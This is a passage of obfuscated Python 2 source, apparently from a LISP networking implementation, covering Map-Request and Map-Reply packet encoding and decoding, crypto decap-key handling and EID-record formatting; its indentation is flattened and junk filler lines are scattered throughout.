lprint ( "Bad JSON 'source-eid' value: {}" . format ( OOo0O0O0o0 ) )
return ( None )
if 32 - 32: i11iIiiIii - OoOoOO00 * I11i . Oo0Ooo * ooOoO0o
if 21 - 21: OOooOOo
self . source_eid . afi = O000oOOoOOO
self . source_eid . store_address ( OOo0O0O0o0 )
if 11 - 11: oO0o % i11iIiiIii * O0
if ( OoOoO00OoOOo . has_key ( "signature-eid" ) == False ) : return ( packet )
OOo0O0O0o0 = OoOoO00OoOOo [ "signature-eid" ]
if ( OOo0O0O0o0 . count ( ":" ) != 7 ) :
lprint ( "Bad JSON 'signature-eid' value: {}" . format ( OOo0O0O0o0 ) )
return ( None )
if 28 - 28: I1Ii111 / iIii1I11I1II1 + OOooOOo . I1ii11iIi11i % OOooOOo + OoO0O00
if 79 - 79: oO0o
self . signature_eid . afi = LISP_AFI_IPV6
self . signature_eid . store_address ( OOo0O0O0o0 )
if 39 - 39: I1Ii111 % oO0o % O0 % O0 - iII111i - oO0o
if ( OoOoO00OoOOo . has_key ( "signature" ) == False ) : return ( packet )
o00 = binascii . a2b_base64 ( OoOoO00OoOOo [ "signature" ] )
self . map_request_signature = o00
return ( packet )
if 83 - 83: i11iIiiIii + iIii1I11I1II1
if 21 - 21: o0oOOo0O0Ooo / i11iIiiIii % I1Ii111
def decode ( self , packet , source , port ) :
O00oO00oOO00O = "I"
ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
if 56 - 56: o0oOOo0O0Ooo * iIii1I11I1II1 . Ii1I + OoOoOO00 % I1Ii111
ooo0OOoo = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] )
ooo0OOoo = ooo0OOoo [ 0 ]
packet = packet [ ooOoooOoo0oO : : ]
if 11 - 11: OOooOOo
O00oO00oOO00O = "Q"
ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
if 12 - 12: OoooooooOO * OOooOOo * I1ii11iIi11i * ooOoO0o
oOO000 = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] )
packet = packet [ ooOoooOoo0oO : : ]
if 26 - 26: OoooooooOO . i1IIi + OoO0O00
ooo0OOoo = socket . ntohl ( ooo0OOoo )
self . auth_bit = True if ( ooo0OOoo & 0x08000000 ) else False
self . map_data_present = True if ( ooo0OOoo & 0x04000000 ) else False
self . rloc_probe = True if ( ooo0OOoo & 0x02000000 ) else False
self . smr_bit = True if ( ooo0OOoo & 0x01000000 ) else False
self . pitr_bit = True if ( ooo0OOoo & 0x00800000 ) else False
self . smr_invoked_bit = True if ( ooo0OOoo & 0x00400000 ) else False
self . mobile_node = True if ( ooo0OOoo & 0x00200000 ) else False
self . xtr_id_present = True if ( ooo0OOoo & 0x00100000 ) else False
self . local_xtr = True if ( ooo0OOoo & 0x00004000 ) else False
self . dont_reply_bit = True if ( ooo0OOoo & 0x00002000 ) else False
self . itr_rloc_count = ( ( ooo0OOoo >> 8 ) & 0x1f ) + 1
self . record_count = ooo0OOoo & 0xff
self . nonce = oOO000 [ 0 ]
if 42 - 42: i11iIiiIii * o0oOOo0O0Ooo % I11i % Oo0Ooo + o0oOOo0O0Ooo * i11iIiiIii
if 66 - 66: Ii1I / IiII . OoooooooOO * Oo0Ooo % i11iIiiIii
if 100 - 100: I1ii11iIi11i % II111iiii * i11iIiiIii - iII111i
if 69 - 69: OOooOOo + iII111i / I1Ii111
if ( self . xtr_id_present ) :
if ( self . decode_xtr_id ( packet ) == False ) : return ( None )
if 37 - 37: iIii1I11I1II1 * I11i / IiII * Oo0Ooo % i11iIiiIii
if 93 - 93: ooOoO0o + ooOoO0o
ooOoooOoo0oO = struct . calcsize ( "H" )
if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
if 65 - 65: OoooooooOO * I11i * oO0o % I1ii11iIi11i * II111iiii
O000oOOoOOO = struct . unpack ( "H" , packet [ : ooOoooOoo0oO ] )
self . source_eid . afi = socket . ntohs ( O000oOOoOOO [ 0 ] )
packet = packet [ ooOoooOoo0oO : : ]
if 86 - 86: i11iIiiIii / I11i * iII111i - iII111i
if ( self . source_eid . afi == LISP_AFI_LCAF ) :
iIiiIIi1i111iI = packet
packet = self . source_eid . lcaf_decode_iid ( packet )
if ( packet == None ) :
packet = self . lcaf_decode_json ( iIiiIIi1i111iI )
if ( packet == None ) : return ( None )
if 10 - 10: IiII % II111iiii
elif ( self . source_eid . afi != LISP_AFI_NONE ) :
packet = self . source_eid . unpack_address ( packet )
if ( packet == None ) : return ( None )
if 50 - 50: OoOoOO00 * iII111i
self . source_eid . mask_len = self . source_eid . host_mask_len ( )
if 59 - 59: I1IiiI * I1IiiI / I11i
ooOO0oO0 = ( os . getenv ( "LISP_NO_CRYPTO" ) != None )
self . itr_rlocs = [ ]
while ( self . itr_rloc_count != 0 ) :
ooOoooOoo0oO = struct . calcsize ( "H" )
if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
if 50 - 50: Oo0Ooo
O000oOOoOOO = struct . unpack ( "H" , packet [ : ooOoooOoo0oO ] ) [ 0 ]
if 16 - 16: Ii1I - OoOoOO00 % Oo0Ooo / Ii1I . I11i + ooOoO0o
III1iii1 = lisp_address ( LISP_AFI_NONE , "" , 32 , 0 )
III1iii1 . afi = socket . ntohs ( O000oOOoOOO )
if 78 - 78: iIii1I11I1II1 + OoO0O00 + i11iIiiIii
if 21 - 21: Oo0Ooo + Ii1I % ooOoO0o + OoOoOO00 % I11i
if 22 - 22: i1IIi / OoooooooOO . OoO0O00
if 83 - 83: I1IiiI - OoooooooOO + I1ii11iIi11i . Ii1I / o0oOOo0O0Ooo + ooOoO0o
if 90 - 90: I1IiiI - i11iIiiIii
if ( III1iii1 . afi != LISP_AFI_LCAF ) :
if ( len ( packet ) < III1iii1 . addr_length ( ) ) : return ( None )
packet = III1iii1 . unpack_address ( packet [ ooOoooOoo0oO : : ] )
if ( packet == None ) : return ( None )
if 42 - 42: OOooOOo . Oo0Ooo
if ( ooOO0oO0 ) :
self . itr_rlocs . append ( III1iii1 )
self . itr_rloc_count -= 1
continue
if 21 - 21: iII111i . I1IiiI / I11i
if 97 - 97: iIii1I11I1II1 + i1IIi - o0oOOo0O0Ooo
oo0o00OO = lisp_build_crypto_decap_lookup_key ( III1iii1 , port )
if 73 - 73: OoO0O00 - i11iIiiIii % I1Ii111 / Oo0Ooo - OoooooooOO % OOooOOo
if 79 - 79: I1IiiI / o0oOOo0O0Ooo . Ii1I * I1ii11iIi11i + I11i
if 96 - 96: OoO0O00 * II111iiii
if 1 - 1: I1IiiI - OoOoOO00
if 74 - 74: OoOoOO00 * II111iiii + O0 + I11i
if ( lisp_nat_traversal and III1iii1 . is_private_address ( ) and source ) : III1iii1 = source
if 3 - 3: iIii1I11I1II1 - i1IIi / iII111i + i1IIi + O0
Ii1OOO0oo0o0 = lisp_crypto_keys_by_rloc_decap
if ( Ii1OOO0oo0o0 . has_key ( oo0o00OO ) ) : Ii1OOO0oo0o0 . pop ( oo0o00OO )
if 38 - 38: OoO0O00 * I1ii11iIi11i
if 4 - 4: OoO0O00 . I1ii11iIi11i
if 21 - 21: i11iIiiIii / OoO0O00 / I1ii11iIi11i * O0 - II111iiii * OOooOOo
if 27 - 27: o0oOOo0O0Ooo . OoOoOO00 * Ii1I * iII111i * O0
if 93 - 93: IiII % I1Ii111 % II111iiii
if 20 - 20: OoooooooOO * I1Ii111
lisp_write_ipc_decap_key ( oo0o00OO , None )
else :
OO0o0 = packet
i1ii1iiI11ii1II1 = lisp_keys ( 1 )
packet = i1ii1iiI11ii1II1 . decode_lcaf ( OO0o0 , 0 )
if ( packet == None ) : return ( None )
if 33 - 33: oO0o / I11i . OoOoOO00 * O0 - IiII
if 12 - 12: i11iIiiIii + I1ii11iIi11i * OoO0O00
if 13 - 13: Oo0Ooo + OoooooooOO / IiII
if 56 - 56: I1ii11iIi11i * II111iiii
Iii = [ LISP_CS_25519_CBC , LISP_CS_25519_GCM ,
LISP_CS_25519_CHACHA ]
if ( i1ii1iiI11ii1II1 . cipher_suite in Iii ) :
if ( i1ii1iiI11ii1II1 . cipher_suite == LISP_CS_25519_CBC or
i1ii1iiI11ii1II1 . cipher_suite == LISP_CS_25519_GCM ) :
ii1i1I1111ii = lisp_keys ( 1 , do_poly = False , do_chacha = False )
if 75 - 75: I11i . o0oOOo0O0Ooo - i11iIiiIii / I11i
if ( i1ii1iiI11ii1II1 . cipher_suite == LISP_CS_25519_CHACHA ) :
ii1i1I1111ii = lisp_keys ( 1 , do_poly = True , do_chacha = True )
if 100 - 100: i11iIiiIii * i11iIiiIii . iIii1I11I1II1 % iII111i * I1ii11iIi11i
else :
ii1i1I1111ii = lisp_keys ( 1 , do_poly = False , do_curve = False ,
do_chacha = False )
if 17 - 17: Ii1I * IiII * i11iIiiIii / I1ii11iIi11i / i11iIiiIii
packet = ii1i1I1111ii . decode_lcaf ( OO0o0 , 0 )
if ( packet == None ) : return ( None )
if 23 - 23: OoooooooOO + i11iIiiIii / Oo0Ooo / iII111i . iII111i * I1IiiI
if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
O000oOOoOOO = struct . unpack ( "H" , packet [ : ooOoooOoo0oO ] ) [ 0 ]
III1iii1 . afi = socket . ntohs ( O000oOOoOOO )
if ( len ( packet ) < III1iii1 . addr_length ( ) ) : return ( None )
if 98 - 98: IiII
packet = III1iii1 . unpack_address ( packet [ ooOoooOoo0oO : : ] )
if ( packet == None ) : return ( None )
if 23 - 23: I11i / i1IIi * OoO0O00
if ( ooOO0oO0 ) :
self . itr_rlocs . append ( III1iii1 )
self . itr_rloc_count -= 1
continue
if 51 - 51: OOooOOo - OoooooooOO / OoooooooOO % OoooooooOO
if 85 - 85: OoO0O00 . o0oOOo0O0Ooo . I1IiiI
oo0o00OO = lisp_build_crypto_decap_lookup_key ( III1iii1 , port )
if 75 - 75: iIii1I11I1II1 - Ii1I % O0 % IiII
II1II1iiIiI = None
if ( lisp_nat_traversal and III1iii1 . is_private_address ( ) and source ) : III1iii1 = source
if 31 - 31: I1Ii111 . I1ii11iIi11i + IiII
if 65 - 65: I1IiiI * O0 * Oo0Ooo . O0
if ( lisp_crypto_keys_by_rloc_decap . has_key ( oo0o00OO ) ) :
oOoo0oO = lisp_crypto_keys_by_rloc_decap [ oo0o00OO ]
II1II1iiIiI = oOoo0oO [ 1 ] if oOoo0oO and oOoo0oO [ 1 ] else None
if 23 - 23: OoO0O00 / IiII * II111iiii
if 32 - 32: I1Ii111 - iIii1I11I1II1 / I11i * OoO0O00 * OoO0O00
oo0Oo0oo = True
if ( II1II1iiIiI ) :
if ( II1II1iiIiI . compare_keys ( ii1i1I1111ii ) ) :
self . keys = [ None , II1II1iiIiI , None , None ]
lprint ( "Maintain stored decap-keys for RLOC {}" . format ( red ( oo0o00OO , False ) ) )
if 71 - 71: OOooOOo
else :
oo0Oo0oo = False
oo0oO = bold ( "Remote decap-rekeying" , False )
lprint ( "{} for RLOC {}" . format ( oo0oO , red ( oo0o00OO ,
False ) ) )
ii1i1I1111ii . copy_keypair ( II1II1iiIiI )
ii1i1I1111ii . uptime = II1II1iiIiI . uptime
II1II1iiIiI = None
if 11 - 11: o0oOOo0O0Ooo * OoO0O00
if 92 - 92: OoOoOO00 . Oo0Ooo * I11i
if 86 - 86: O0
if ( II1II1iiIiI == None ) :
self . keys = [ None , ii1i1I1111ii , None , None ]
if ( lisp_i_am_etr == False and lisp_i_am_rtr == False ) :
ii1i1I1111ii . local_public_key = None
lprint ( "{} for {}" . format ( bold ( "Ignoring decap-keys" ,
False ) , red ( oo0o00OO , False ) ) )
elif ( ii1i1I1111ii . remote_public_key != None ) :
if ( oo0Oo0oo ) :
lprint ( "{} for RLOC {}" . format ( bold ( "New decap-keying" , False ) ,
# II111iiii % I1IiiI % Ii1I * I1ii11iIi11i
red ( oo0o00OO , False ) ) )
if 74 - 74: o0oOOo0O0Ooo / OoO0O00 + iII111i - i1IIi / OoooooooOO / I1ii11iIi11i
ii1i1I1111ii . compute_shared_key ( "decap" )
ii1i1I1111ii . add_key_by_rloc ( oo0o00OO , False )
if 56 - 56: oO0o + I1IiiI . I11i
if 67 - 67: IiII / o0oOOo0O0Ooo + I11i % iII111i - ooOoO0o - I1IiiI
if 44 - 44: Ii1I . o0oOOo0O0Ooo . iIii1I11I1II1 + OoooooooOO - I1IiiI
if 22 - 22: I11i * I1ii11iIi11i . OoooooooOO / Oo0Ooo / Ii1I
self . itr_rlocs . append ( III1iii1 )
self . itr_rloc_count -= 1
if 54 - 54: I1Ii111 % Ii1I + ooOoO0o
if 45 - 45: Ii1I / oO0o * I1Ii111 . Ii1I
ooOoooOoo0oO = struct . calcsize ( "BBH" )
if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
if 25 - 25: I1ii11iIi11i / I1ii11iIi11i
Ii1 , iIi1iii1 , O000oOOoOOO = struct . unpack ( "BBH" , packet [ : ooOoooOoo0oO ] )
self . subscribe_bit = ( Ii1 & 0x80 )
self . target_eid . afi = socket . ntohs ( O000oOOoOOO )
packet = packet [ ooOoooOoo0oO : : ]
if 79 - 79: Oo0Ooo - OoO0O00 % Oo0Ooo . II111iiii
self . target_eid . mask_len = iIi1iii1
if ( self . target_eid . afi == LISP_AFI_LCAF ) :
packet , o0Ooo0Oooo0o = self . target_eid . lcaf_decode_eid ( packet )
if ( packet == None ) : return ( None )
if ( o0Ooo0Oooo0o ) : self . target_group = o0Ooo0Oooo0o
else :
packet = self . target_eid . unpack_address ( packet )
if ( packet == None ) : return ( None )
packet = packet [ ooOoooOoo0oO : : ]
if 22 - 22: oO0o / II111iiii . OoOoOO00
return ( packet )
if 9 - 9: i11iIiiIii + ooOoO0o . iIii1I11I1II1 * OoOoOO00
if 4 - 4: I1Ii111 + iII111i % O0
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . target_eid , self . target_group ) )
if 98 - 98: i1IIi + I1Ii111 - I1ii11iIi11i . OoooooooOO / O0 / iII111i
if 66 - 66: i1IIi % OoooooooOO * i11iIiiIii + oO0o * O0 / OoO0O00
def encode_xtr_id ( self , packet ) :
OoOO = self . xtr_id >> 64
IiI1i111III = self . xtr_id & 0xffffffffffffffff
OoOO = byte_swap_64 ( OoOO )
IiI1i111III = byte_swap_64 ( IiI1i111III )
packet += struct . pack ( "QQ" , OoOO , IiI1i111III )
return ( packet )
if 14 - 14: I1IiiI . IiII
if 29 - 29: OoooooooOO / IiII + OoOoOO00 - I1Ii111 + IiII . i1IIi
def decode_xtr_id ( self , packet ) :
ooOoooOoo0oO = struct . calcsize ( "QQ" )
if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
packet = packet [ len ( packet ) - ooOoooOoo0oO : : ]
OoOO , IiI1i111III = struct . unpack ( "QQ" , packet [ : ooOoooOoo0oO ] )
OoOO = byte_swap_64 ( OoOO )
IiI1i111III = byte_swap_64 ( IiI1i111III )
self . xtr_id = ( OoOO << 64 ) | IiI1i111III
return ( True )
if 26 - 26: i11iIiiIii - II111iiii
if 43 - 43: I1IiiI
if 35 - 35: ooOoO0o + OoOoOO00 * OoooooooOO - II111iiii
if 19 - 19: i1IIi / Ii1I / OoOoOO00 . I1IiiI / Ii1I % o0oOOo0O0Ooo
if 39 - 39: ooOoO0o - OoooooooOO
if 88 - 88: i1IIi + iIii1I11I1II1 * i11iIiiIii - OoooooooOO % o0oOOo0O0Ooo
if 74 - 74: ooOoO0o - i11iIiiIii
if 34 - 34: IiII + I1Ii111 + Oo0Ooo / II111iiii
if 33 - 33: Ii1I . i1IIi - II111iiii - OoO0O00
if 31 - 31: I11i - OoOoOO00 / o0oOOo0O0Ooo * OoOoOO00 / Oo0Ooo + o0oOOo0O0Ooo
if 46 - 46: IiII * OoO0O00 / OOooOOo + Oo0Ooo
if 24 - 24: ooOoO0o % OOooOOo . O0 * Oo0Ooo
if 52 - 52: O0 . I1Ii111 + iII111i / i11iIiiIii
if 52 - 52: oO0o % Oo0Ooo * II111iiii
if 24 - 24: i11iIiiIii * i1IIi * i1IIi
if 27 - 27: i1IIi - oO0o + OOooOOo
if 3 - 3: IiII % I1Ii111 . OoooooooOO
if 19 - 19: I1Ii111 * Ii1I - oO0o
if 78 - 78: OoO0O00 - Ii1I / OOooOOo
if 81 - 81: OoOoOO00
if 21 - 21: iII111i / OOooOOo % IiII
if 51 - 51: I11i + ooOoO0o / I1IiiI
if 3 - 3: iIii1I11I1II1 / OOooOOo % oO0o . Ii1I - Ii1I
if 55 - 55: i11iIiiIii % OoooooooOO + O0
if 7 - 7: ooOoO0o - i11iIiiIii * iII111i / Ii1I - o0oOOo0O0Ooo
if 62 - 62: o0oOOo0O0Ooo - iIii1I11I1II1 . I11i . Ii1I * Ii1I
if 24 - 24: I11i
if 93 - 93: I1IiiI % OoO0O00 / i11iIiiIii / I11i
if 60 - 60: ooOoO0o - Ii1I . I1IiiI * oO0o * i11iIiiIii
if 29 - 29: OoO0O00 - Oo0Ooo . oO0o / OoO0O00 % i11iIiiIii
if 26 - 26: ooOoO0o . I1Ii111 / II111iiii % Ii1I
if 82 - 82: OOooOOo % O0 % iIii1I11I1II1 % IiII + i11iIiiIii
class lisp_map_reply ( ) :
def __init__ ( self ) :
self . rloc_probe = False
self . echo_nonce_capable = False
self . security = False
self . record_count = 0
self . hop_count = 0
self . nonce = 0
self . keys = None
if 64 - 64: i1IIi / IiII . IiII - I1Ii111 % OOooOOo . II111iiii
if 78 - 78: I1Ii111 - O0 - I1Ii111 . iIii1I11I1II1 % I1ii11iIi11i . OoooooooOO
def print_map_reply ( self ) :
oOOo0ooO0 = "{} -> flags: {}{}{}, hop-count: {}, record-count: {}, " + "nonce: 0x{}"
if 64 - 64: IiII
lprint ( oOOo0ooO0 . format ( bold ( "Map-Reply" , False ) , "R" if self . rloc_probe else "r" ,
# o0oOOo0O0Ooo - o0oOOo0O0Ooo
"E" if self . echo_nonce_capable else "e" ,
"S" if self . security else "s" , self . hop_count , self . record_count ,
lisp_hex_string ( self . nonce ) ) )
if 90 - 90: OoooooooOO . OoooooooOO . I1ii11iIi11i * Ii1I - iII111i % I1IiiI
if 95 - 95: iIii1I11I1II1 . I1ii11iIi11i - I1ii11iIi11i + oO0o
def encode ( self ) :
ooo0OOoo = ( LISP_MAP_REPLY << 28 ) | self . record_count
ooo0OOoo |= self . hop_count << 8
if ( self . rloc_probe ) : ooo0OOoo |= 0x08000000
if ( self . echo_nonce_capable ) : ooo0OOoo |= 0x04000000
if ( self . security ) : ooo0OOoo |= 0x02000000
if 47 - 47: o0oOOo0O0Ooo . OoO0O00
IIii1i = struct . pack ( "I" , socket . htonl ( ooo0OOoo ) )
IIii1i += struct . pack ( "Q" , self . nonce )
return ( IIii1i )
if 60 - 60: I1ii11iIi11i
if 90 - 90: OoOoOO00 / i11iIiiIii + iIii1I11I1II1 . oO0o . oO0o + iII111i
def decode ( self , packet ) :
O00oO00oOO00O = "I"
ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
if 100 - 100: IiII % i1IIi / iII111i
ooo0OOoo = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] )
ooo0OOoo = ooo0OOoo [ 0 ]
packet = packet [ ooOoooOoo0oO : : ]
if 39 - 39: I1IiiI - iII111i - i11iIiiIii + OoooooooOO
O00oO00oOO00O = "Q"
ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
if 74 - 74: OOooOOo - II111iiii
oOO000 = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] )
packet = packet [ ooOoooOoo0oO : : ]
if 66 - 66: i11iIiiIii + I1Ii111 . ooOoO0o
ooo0OOoo = socket . ntohl ( ooo0OOoo )
self . rloc_probe = True if ( ooo0OOoo & 0x08000000 ) else False
self . echo_nonce_capable = True if ( ooo0OOoo & 0x04000000 ) else False
self . security = True if ( ooo0OOoo & 0x02000000 ) else False
self . hop_count = ( ooo0OOoo >> 8 ) & 0xff
self . record_count = ooo0OOoo & 0xff
self . nonce = oOO000 [ 0 ]
if 46 - 46: I1Ii111 / I1ii11iIi11i
if ( lisp_crypto_keys_by_nonce . has_key ( self . nonce ) ) :
self . keys = lisp_crypto_keys_by_nonce [ self . nonce ]
self . keys [ 1 ] . delete_key_by_nonce ( self . nonce )
if 41 - 41: i1IIi % Ii1I + I1Ii111 . Oo0Ooo / iIii1I11I1II1
return ( packet )
if 77 - 77: Oo0Ooo . OoO0O00 % O0 - OoO0O00 - Oo0Ooo
if 95 - 95: IiII * II111iiii % o0oOOo0O0Ooo * Oo0Ooo . I11i
if 46 - 46: II111iiii - OoO0O00 % ooOoO0o
if 97 - 97: OoO0O00 . OoOoOO00
if 78 - 78: I1ii11iIi11i + I1ii11iIi11i . OoOoOO00 - IiII * iIii1I11I1II1 * O0
if 26 - 26: OoooooooOO + oO0o + OoO0O00 . O0
if 46 - 46: OoooooooOO - Oo0Ooo * I1Ii111 * OOooOOo * I1Ii111 . oO0o
if 96 - 96: Ii1I / IiII % o0oOOo0O0Ooo + I11i
if 46 - 46: OoO0O00 * I1IiiI
if 25 - 25: I1Ii111 . IiII % O0 % i1IIi
if 53 - 53: O0 % ooOoO0o
if 41 - 41: IiII
if 29 - 29: ooOoO0o
if 70 - 70: oO0o . O0 % I11i % IiII - I11i * I1ii11iIi11i
if 22 - 22: i1IIi
if 82 - 82: oO0o . iIii1I11I1II1 - I1ii11iIi11i
if 55 - 55: Oo0Ooo % Ii1I . iIii1I11I1II1 * I1Ii111
if 33 - 33: O0 - I1IiiI / I1ii11iIi11i / OoO0O00 + iII111i - oO0o
if 27 - 27: I1Ii111 + ooOoO0o - I1Ii111 % i11iIiiIii * Oo0Ooo * o0oOOo0O0Ooo
if 88 - 88: OOooOOo
if 25 - 25: OoO0O00 + o0oOOo0O0Ooo . ooOoO0o - Ii1I . oO0o * Ii1I
if 85 - 85: i1IIi
if 94 - 94: OoooooooOO . O0 / OoooooooOO
if 67 - 67: i11iIiiIii + OoOoOO00
if 50 - 50: ooOoO0o . i1IIi + I1ii11iIi11i . OOooOOo
if 97 - 97: I1IiiI
if 63 - 63: O0 - OoOoOO00 / i11iIiiIii / OoooooooOO / ooOoO0o / II111iiii
if 45 - 45: II111iiii . OoO0O00 + OoO0O00 * iIii1I11I1II1
if 23 - 23: IiII * OoOoOO00 % Ii1I / Ii1I - ooOoO0o - OOooOOo
if 86 - 86: OOooOOo . OoooooooOO * I1IiiI - Oo0Ooo / i11iIiiIii * iII111i
if 56 - 56: I1IiiI . I11i % iII111i
if 33 - 33: I11i / OOooOOo - OOooOOo / i11iIiiIii * OoOoOO00 + O0
class lisp_eid_record ( ) :
def __init__ ( self ) :
self . record_ttl = 0
self . rloc_count = 0
self . action = 0
self . authoritative = False
self . ddt_incomplete = False
self . signature_count = 0
self . map_version = 0
self . eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . group = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . record_ttl = 0
if 2 - 2: i11iIiiIii % I1IiiI
if 90 - 90: II111iiii
def print_prefix ( self ) :
if ( self . group . is_null ( ) ) :
return ( green ( self . eid . print_prefix ( ) , False ) )
if 2 - 2: Ii1I - OoooooooOO - i11iIiiIii % Oo0Ooo / Ii1I
return ( green ( self . eid . print_sg ( self . group ) , False ) )
if 77 - 77: o0oOOo0O0Ooo . o0oOOo0O0Ooo * I1Ii111 + OOooOOo - i11iIiiIii
if 45 - 45: I1IiiI . I1IiiI - Oo0Ooo * OOooOOo
def print_ttl ( self ) :
oo0o = self . record_ttl
if ( self . record_ttl & 0x80000000 ) :
oo0o = str ( self . record_ttl & 0x7fffffff ) + " secs"
elif ( ( oo0o % 60 ) == 0 ) :
oo0o = str ( oo0o / 60 ) + " hours"
else :
oo0o = str ( oo0o ) + " mins"
if 6 - 6: II111iiii * IiII
return ( oo0o )
if 51 - 51: Ii1I . i11iIiiIii + oO0o % OoOoOO00
if 97 - 97: OOooOOo . OOooOOo . iII111i . iII111i
def store_ttl ( self ) :
oo0o = self . record_ttl * 60
if ( self . record_ttl & 0x80000000 ) : oo0o = self . record_ttl & 0x7fffffff
return ( oo0o )
if 63 - 63: O0 * IiII / Oo0Ooo . I1IiiI . I1IiiI / i11iIiiIii
if 17 - 17: iIii1I11I1II1 / OoO0O00 - II111iiii
def print_record ( self , indent , ddt ) :
IiiIIiIi1i11i = ""
O00o0o00O0O = ""
I1iIi1I1I1i = bold ( "invalid-action" , False )
if ( ddt ) :
if ( self . action < len ( lisp_map_referral_action_string ) ) :
I1iIi1I1I1i = lisp_map_referral_action_string [ self . action ]
I1iIi1I1I1i = bold ( I1iIi1I1I1i , False )
IiiIIiIi1i11i = ( ", " + bold ( "ddt-incomplete" , False ) ) if self . ddt_incomplete else ""
if 39 - 39: iIii1I11I1II1 / I1ii11iIi11i + i1IIi + OoO0O00 + I1IiiI
O00o0o00O0O = ( ", sig-count: " + str ( self . signature_count ) ) if ( self . signature_count != 0 ) else ""
if 82 - 82: Oo0Ooo . i11iIiiIii + i11iIiiIii
if 74 - 74: oO0o . i11iIiiIii / iIii1I11I1II1 - I1ii11iIi11i * ooOoO0o - O0
else :
if ( self . action < len ( lisp_map_reply_action_string ) ) :
I1iIi1I1I1i = lisp_map_reply_action_string [ self . action ]
if ( self . action != LISP_NO_ACTION ) :
I1iIi1I1I1i = bold ( I1iIi1I1I1i , False )
if 75 - 75: iIii1I11I1II1 . I1IiiI - Ii1I % OoOoOO00
if 38 - 38: i1IIi - oO0o . OoooooooOO
if 40 - 40: I11i
if 44 - 44: ooOoO0o
O000oOOoOOO = LISP_AFI_LCAF if ( self . eid . afi < 0 ) else self . eid . afi
oOOo0ooO0 = ( "{}EID-record -> record-ttl: {}, rloc-count: {}, action: " +
"{}, {}{}{}, map-version: {}, afi: {}, [iid]eid/ml: {}" )
if 35 - 35: II111iiii + iII111i / I1ii11iIi11i * I1IiiI . I11i
lprint ( oOOo0ooO0 . format ( indent , self . print_ttl ( ) , self . rloc_count ,
I1iIi1I1I1i , "auth" if ( self . authoritative is True ) else "non-auth" ,
IiiIIiIi1i11i , O00o0o00O0O , self . map_version , O000oOOoOOO ,
green ( self . print_prefix ( ) , False ) ) )
if 97 - 97: I1IiiI / o0oOOo0O0Ooo
if 13 - 13: I1ii11iIi11i
def encode ( self ) :
OOo000 = self . action << 13
if ( self . authoritative ) : OOo000 |= 0x1000
if ( self . ddt_incomplete ) : OOo000 |= 0x800
if 40 - 40: I1ii11iIi11i * iIii1I11I1II1 % OoOoOO00
if 50 - 50: i11iIiiIii + ooOoO0o
if 41 - 41: I1IiiI * OoO0O00 + IiII / OoO0O00 . I1Ii111
if 2 - 2: O0 % o0oOOo0O0Ooo
O000oOOoOOO = self . eid . afi if ( self . eid . instance_id == 0 ) else LISP_AFI_LCAF
if ( O000oOOoOOO < 0 ) : O000oOOoOOO = LISP_AFI_LCAF
iiI1 = ( self . group . is_null ( ) == False )
if ( iiI1 ) : O000oOOoOOO = LISP_AFI_LCAF
if 64 - 64: OoOoOO00
iIiiii = ( self . signature_count << 12 ) | self . map_version
iIi1iii1 = 0 if self . eid . is_binary ( ) == False else self . eid . mask_len
if 25 - 25: II111iiii + I11i
IIii1i = struct . pack ( "IBBHHH" , socket . htonl ( self . record_ttl ) ,
self . rloc_count , iIi1iii1 , socket . htons ( OOo000 ) ,
socket . htons ( iIiiii ) , socket . htons ( O000oOOoOOO ) )
if 97 - 97: O0 + OOooOOo % OoOoOO00 * I11i . iIii1I11I1II1
if 94 - 94: oO0o
if 53 - 53: ooOoO0o + iII111i * i1IIi + I1IiiI
if 89 - 89: I1IiiI / II111iiii - OoOoOO00 % o0oOOo0O0Ooo
if ( iiI1 ) :
IIii1i += self . eid . lcaf_encode_sg ( self . group )
return ( IIii1i )
if 1 - 1: OoooooooOO . I11i / OoOoOO00 + o0oOOo0O0Ooo % i1IIi
if 1 - 1: OoooooooOO - OoO0O00 - OoooooooOO / iII111i
if 70 - 70: Ii1I + I1ii11iIi11i . II111iiii * i11iIiiIii
if 87 - 87: Ii1I / I1Ii111 % OoOoOO00 * I1ii11iIi11i - OoooooooOO / OoOoOO00
if 24 - 24: I11i . OOooOOo * i1IIi . I1ii11iIi11i / ooOoO0o / O0
if ( self . eid . afi == LISP_AFI_GEO_COORD and self . eid . instance_id == 0 ) :
IIii1i = IIii1i [ 0 : - 2 ]
IIii1i += self . eid . address . encode_geo ( )
return ( IIii1i )
if 62 - 62: o0oOOo0O0Ooo % II111iiii
if 22 - 22: oO0o - o0oOOo0O0Ooo
if 89 - 89: OOooOOo
if 34 - 34: iII111i . OOooOOo
if 13 - 13: OoO0O00 * OOooOOo + oO0o
if ( O000oOOoOOO == LISP_AFI_LCAF ) :
IIii1i += self . eid . lcaf_encode_iid ( )
return ( IIii1i )
if 21 - 21: i11iIiiIii . Ii1I % i1IIi * Ii1I . oO0o + Ii1I
if 92 - 92: i1IIi + OoO0O00 * I11i
if 70 - 70: Oo0Ooo
if 93 - 93: iII111i . I1ii11iIi11i . Oo0Ooo . oO0o . OoooooooOO
if 51 - 51: O0 - iII111i
IIii1i += self . eid . pack_address ( )
return ( IIii1i )
if 65 - 65: O0 / II111iiii * IiII % Ii1I + o0oOOo0O0Ooo
if 43 - 43: I1Ii111 + OoO0O00 * OoooooooOO
def decode ( self , packet ) :
O00oO00oOO00O = "IBBHHH"
ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
